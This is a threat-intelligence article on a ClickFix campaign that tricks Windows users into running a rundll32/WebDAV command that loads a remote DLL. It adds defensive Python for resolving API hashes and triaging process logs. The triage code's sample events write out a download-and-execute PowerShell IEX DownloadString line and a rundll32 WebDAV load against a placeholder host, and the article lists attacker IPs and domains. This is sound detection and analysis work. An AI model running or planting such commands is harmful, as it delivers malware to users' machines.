New ClickFix Variant Evades PowerShell via Rundll32

Marcus Rodriguez
March 30, 2026 4 Min Read

A more dangerous variant of the ClickFix attack technique is now actively targeting Windows users. Unlike older versions that leveraged PowerShell or mshta for command execution, this new iteration adopts a different approach.

It uses rundll32.exe and WebDAV, two built-in Windows components, to quietly deliver and execute harmful payloads without triggering most common security alerts.

This shift makes the attack harder to catch, especially for organizations whose defenses are focused mainly on detecting script-based threats.

ClickFix attacks are known for tricking users into running malicious commands on their own computers. In this case, the attacker sets up a fake website disguised as a CAPTCHA verification page.

The site, identified as “healthybyhillary[.]com,” instructs the visitor to press Win + R to open the Windows Run dialog, then paste a pre-copied command using Ctrl + V, and finally press Enter to execute it.

The entire process looks harmless to someone unfamiliar with how these attacks work, making it a very effective social engineering trick.

Phishing Website (Source - CyberProof)

CyberProof analysts identified this new ClickFix variant during active threat monitoring, noting that it significantly reduces reliance on commonly watched scripting engines.

Instead of calling PowerShell directly at the start, the attack uses rundll32.exe with the WebDAV mini-redirector, which allows Windows to access remote files over HTTP as if they were stored on a local network share.

This means the malicious DLL file is pulled from an attacker-controlled server using a command like rundll32.exe [email protected],#1, where the “#1” refers to an export function using an ordinal number rather than a readable name, adding another layer of obfuscation.

The impact of this approach is significant. Security teams that focus detection rules on PowerShell, mshta, or similar scripting engines may completely miss the early stages of this attack.

The malware blends into normal Windows activity because rundll32.exe is a trusted system tool used every day by legitimate applications.

ClickFix Execution via Rundll32 and WebDAV (Source - CyberProof)

This means the initial access and payload delivery can happen with very little noise, giving the attacker a clean entry point into the target environment.

Detection Evasion Through Native Windows Components and In-Memory Execution

What makes this ClickFix variant especially tricky is how it handles everything after the first command runs. Once rundll32.exe fetches and loads the remote DLL via WebDAV, the infection moves into a multi-stage process that stays almost entirely in memory.

The chain transitions to PowerShell at a later stage, using Invoke-Expression (IEX) along with Net.WebClient.DownloadString to pull and run additional payloads without writing files to the disk.

Quiet-execution flags such as -NoP (no profile) and -NonI (non-interactive) are passed to PowerShell to keep the activity as unobtrusive as possible.

Rundll32 Establishing External Network Connection (Source - CyberProof)

The core payload involved in this chain is a secondary loader called SkimokKeep. It is delivered as a 32-bit Windows DLL named verification.google and uses several advanced methods to avoid detection.

Rather than importing Windows API functions the normal way, it walks the Process Environment Block, commonly known as the PEB, to find loaded system modules and resolves functions using a DJB2-style hashing algorithm.

This approach hides which system functions the malware is actually using, making static analysis much harder.
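One standard way analysts counter API hashing is to precompute the hashes of likely export names and match them against constants pulled from the loader. The block below is an added example, not code from the article or from CyberProof; the exact variant SkimokKeep uses is not given, so it assumes the classic djb2 (seed 5381, h = h*33 + c) truncated to 32 bits over case-sensitive ASCII names.

```python
# Added analysis aid: map djb2 hash constants back to Win32 export names.
# Assumption: classic djb2 (seed 5381, h = h*33 + c), 32-bit truncation,
# case-sensitive ASCII. Adjust seed/multiplier if the sample differs.
def djb2(name: str, seed: int = 5381) -> int:
    h = seed
    for ch in name.encode("ascii"):
        h = (h * 33 + ch) & 0xFFFFFFFF
    return h

# Exports the article says the payload relies on (sandbox/anti-debug checks)
# plus a few loader staples; in practice extend this from the full export
# lists of kernel32.dll, user32.dll and ntdll.dll.
CANDIDATES = ["GetSystemMetrics", "GetForegroundWindow", "GetSystemTime",
              "GetTickCount", "GetCurrentProcessId", "LoadLibraryA",
              "GetProcAddress", "VirtualAlloc", "WriteProcessMemory"]

def build_table(names, seed: int = 5381) -> dict:
    """Map 32-bit djb2 hash -> export name, refusing silent collisions."""
    table = {}
    for n in names:
        h = djb2(n, seed)
        if h in table and table[h] != n:
            raise ValueError(f"hash collision: {table[h]} / {n}")
        table[h] = n
    return table

def resolve(constants, table: dict) -> list:
    """Translate hash constants found in the binary into names; constants
    with no match are returned as hex so they can be chased separately."""
    return [table.get(c, f"0x{c:08x}") for c in constants]
```

Feed `resolve()` the 32-bit immediates you see compared against the hashing loop's output in the disassembler; a hit like `GetTickCount` or `GetForegroundWindow` confirms which evasion check that code path implements.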

PE Export Table (Source - CyberProof)

The payload also checks for sandbox and virtual machine environments using functions like GetSystemMetrics, GetForegroundWindow, and GetSystemTime to detect unusual conditions common in automated analysis systems.

On top of that, it uses anti-debugging checks including timing measurements with GetTickCount and process ID inspection, which cause the malware to behave differently or stop running altogether if it suspects it is being examined.

Telemetry further shows that rundll32.exe injects code into legitimate running processes like chrome.exe and msedge.exe by modifying their memory space, helping the malware maintain access while staying hidden.

Attack Chain Summary (Source - CyberProof)

Security teams are strongly advised to monitor all executions of rundll32.exe whose command line includes davclnt.dll and DavSetCookie arguments, as this is a strong indicator of WebDAV-based payload delivery.

Implement command-line auditing for known LOLBins, including rundll32.exe, to catch unusual usage patterns early. Restrict or closely monitor outbound WebDAV traffic on port 80 where it is not operationally needed.
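The monitoring advice above can be turned into a small triage pass over process-creation telemetry. The block below is an added example, not code from the article or from CyberProof: the events are constructed (field names loosely follow a Sysmon Event ID 1 export, and the WebDAV host is a placeholder, not an indicator from the campaign), and the rules encode the traits the article describes: the davclnt.dll/DavSetCookie invocation, a host@80 WebDAV UNC path, an export called by ordinal, and a rundll32-spawned PowerShell using quiet flags with IEX plus DownloadString.

```python
import re

# Constructed sample process-creation events (not real telemetry); the host
# webdav.example.invalid is a placeholder, not an indicator from the article.
EVENTS = [
    {"image": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\davclnt.dll,DavSetCookie "
                r"webdav.example.invalid http://webdav.example.invalid/verification.google"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe \\webdav.example.invalid@80\share\verification.google,#1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "powershell.exe -NoP -NonI -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://webdav.example.invalid/stage2')"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},  # benign control
]

# Each rule: (reason, image name it applies to, regex over the command line).
RULES = [
    ("rundll32 invoking the WebDAV client (davclnt.dll / DavSetCookie)", "rundll32.exe",
     re.compile(r"davclnt\.dll|DavSetCookie", re.I)),
    ("rundll32 given a WebDAV UNC path (host@80 or host@SSL)", "rundll32.exe",
     re.compile(r"\\\\[^\\\s]+@(80|ssl)\\", re.I)),
    ("rundll32 calling a DLL export by ordinal (,#N)", "rundll32.exe",
     re.compile(r",#\d+\b")),
    ("PowerShell quiet flags with IEX + DownloadString (in-memory stage)", "powershell.exe",
     re.compile(r"-No(P|nI)\b.*(IEX|Invoke-Expression).*DownloadString", re.I)),
]

def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def triage(events) -> dict:
    """Return {event index: [reasons]} for events that match at least one rule."""
    hits = {}
    for i, ev in enumerate(events):
        reasons = []
        img = image_name(ev["image"])
        for reason, wanted, rx in RULES:
            if img == wanted and rx.search(ev["cmdline"]):
                reasons.append(reason)
        if img == "powershell.exe" and image_name(ev["parent"]) == "rundll32.exe":
            reasons.append("PowerShell spawned by rundll32 (later stage of the chain)")
        if reasons:
            hits[i] = reasons
    return hits
```

Run `triage(EVENTS)` to see the three malicious events flagged with their reasons while the control-panel launch passes; the same rules map directly onto SIEM queries over rundll32.exe and powershell.exe command lines.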

Block connections to known malicious IP addresses, including 178.16.53[.]137, 141.98.234[.]27, 46.149.73[.]60, and 91.219.23[.]245, as well as suspicious domains such as mer-forgea.sightup[.]in[.]net and data-x7-sync.neurosync[.]in[.]net.

Additionally, organizations should improve user awareness training focused specifically on fake CAPTCHA pages and ClickFix-style social engineering attacks, as the success of this campaign depends entirely on a user following the on-screen instructions.
